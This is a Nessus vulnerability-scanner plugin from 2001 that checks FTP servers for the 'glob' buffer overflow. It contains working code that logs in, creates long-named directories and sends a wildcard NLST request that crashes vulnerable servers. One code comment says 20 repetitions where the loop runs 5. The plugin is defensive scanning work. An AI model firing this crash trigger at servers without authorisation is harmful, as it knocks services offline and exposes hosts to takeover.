1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150
|
#
# This script was written by Renaud Deraison <deraison@cvs.nessus.org>
#
#
# See the Nessus Scripts License for details
#
if(description)
{
script_id(10648);
script_cve_id("CAN-2001-0247");
name["english"] = "ftp 'glob' overflow";
name["francais"] = "Dpassement de buffer ftp par 'glob'";
script_name(english:name["english"],
francais:name["francais"]);
desc["english"] = "
It was possible to make the remote FTP server crash
by creating a huge directory structure and then
attempting to listing it using wildcards.
This is usually known as the 'ftp glob overflow' attack.
It is very likely that an attacker can use this
flaw to execute arbitrary code on the remote
server. This will give him a shell on your system,
which is not a good thing.
Solution : upgrade your FTP server and/or libc
Consider removing directories writable by 'anonymous'.
Risk factor : High";
desc["francais"] = "
Il s'est avr possible de faire planter le serveur
FTP distant en y crant une grande structure de
rpertoires puis en la listant l'aide de wildcards.
On appelle souvent ce problme le 'dpassement de buffer
ftpd par glob'.
Il est trs probable qu'un pirate puisse utiliser ce
problme pour executer du code arbitraire sur le serveur
distant, ce qui lui donnera un shell sur votre systme,
ce qui n'est pas une bonne chose.
Solution : mettez jour votre serveur FTP ou libc, ou contactez
votre vendeur pour un patch.
Facteur de risque : Elev";
script_description(english:desc["english"],
francais:desc["francais"]);
script_summary(english:"Checks if the remote ftp can be buffer overflown",
francais:"Dtermine si le serveur ftp distant peut etre soumis a un dpassement de buffer");
script_category(ACT_DENIAL);
script_family(english:"FTP");
script_family(francais:"FTP");
script_copyright(english:"This script is Copyright (C) 2001 Renaud Deraison",
francais:"Ce script est Copyright (C) 2001 Renaud Deraison");
script_dependencie("find_service.nes", "ftp_write_dirs.nes");
script_require_keys("ftp/login", "ftp/writeable_dir");
script_require_ports("Services/ftp", 21);
exit(0);
}
#
# The script code starts here :
#
# First, we need access
login = get_kb_item("ftp/login");
password = get_kb_item("ftp/password");
# Then, we need a writeable directory
wri = get_kb_item("ftp/writeable_dir");
port = get_kb_item("Services/ftp");
if(!port)port = 21;
# Connect to the FTP server
soc = open_sock_tcp(port);
if(soc)
{
if(login && wri)
{
if(ftp_log_in(socket:soc, user:login, pass:password))
{
# We are in
c = string("CWD ", wri, "\r\n");
send(socket:soc, data:c);
b = recv(socket:soc, length:1024);
cwd = string("CWD ", crap(255), "\r\n");
mkd = string("MKD ", crap(255), "\r\n");
#
# Repeat the same operation 20 times. After the 20th, we
# assume that the server is immune (or has a bigger than
# 5Kb buffer, which is unlikely
#
for(i=0;i<5;i=i+1)
{
send(socket:soc, data:mkd);
b = recv(socket:soc, length:1024);
if(!("257 " >< b)){
if(!("ile exists" >< b))
{
set_kb_item(name:"ftp/no_mkdir", value:TRUE);
exit(0);
}
}
}
port2 = ftp_get_pasv_port(socket:soc);
soc2 = open_sock_tcp(port2);
send(socket:soc, data:string("NLST ", wri, "/X*/X*/X*/X*/X*\r\n"));
b = recv(socket:soc, length:4096);
if(!b){
security_hole(port);
set_kb_item(name:"ftp/wu_ftpd_overflow", value:TRUE);
exit(0);
}
send(socket:soc,data:cwd);
b = recv(socket:soc, length:1024);
quit = string("QUIT\r\n");
send(socket:soc, data:quit);
close(soc);
}
}
}
|